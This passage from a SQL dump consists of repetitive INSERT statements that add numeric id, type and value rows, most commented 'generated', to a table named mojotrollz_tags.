`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8891, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8891, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8892, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8892, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8892, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8893, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8893, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8893, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8894, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8894, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8894, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8895, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8895, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8895, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8896, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8896, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8896, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8897, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8897, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8897, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8898, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8898, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8898, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8899, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8899, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8899, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8900, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8900, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8900, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8901, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8901, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8901, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8902, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8902, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8902, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8903, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8903, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8903, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8904, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8904, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8904, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8905, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8905, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8905, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8906, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8906, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8906, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8907, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8907, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8907, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8908, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8908, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8908, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8909, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8909, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8909, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8910, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8910, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8910, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8911, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8911, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8911, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8912, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8912, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8912, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8913, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8913, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8913, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8914, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8914, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8914, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8915, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8915, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8915, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8916, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8916, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8916, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8917, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8917, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8920, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8920, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8920, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8921, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8921, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8921, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8922, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8922, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8922, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8923, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8924, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8925, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8926, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8927, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8928, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8929, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8929, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8929, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8931, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8931, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8932, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8933, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8934, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8934, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8937, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8956, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8956, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8957, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8957, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8958, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8958, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8959, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8959, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8960, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8960, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8961, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8961, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8962, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8962, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8963, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8963, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8964, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8964, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8965, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8965, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8976, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8976, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8977, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8977, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8978, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8978, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8979, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8979, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8980, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8981, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8981, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8982, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8982, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8982, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8983, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8983, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8983, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8996, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8997, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8997, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9016, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9016, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9016, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9017, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9017, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9017, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9018, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9018, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9018, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9019, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9019, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9019, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9020, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9020, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9020, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9021, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9021, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9021, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9022, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9022, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9022, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9023, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9023, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9023, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9024, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9024, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9024, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9025, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9025, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9025, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9026, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9026, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9027, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9028, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9029, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9030, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9031, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9032, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9033, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9033, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9033, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9034, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9034, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9034, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9035, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9035, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9035, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9036, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9036, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9036, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9037, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9037, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9037, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9038, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9038, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9038, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9039, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9039, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9039, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9040, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9040, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9040, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9041, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9041, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9041, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9042, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9042, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9042, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9043, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9043, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9044, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9044, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9045, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9045, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9045, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9046, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9046, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9047, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9047, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9056, 1, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9056, 1, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9056, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9076, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9076, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9077, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9077, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9078, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9078, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9079, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9079, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9080, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9080, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9081, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9081, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9082, 1, 1, 0, 'generated'); 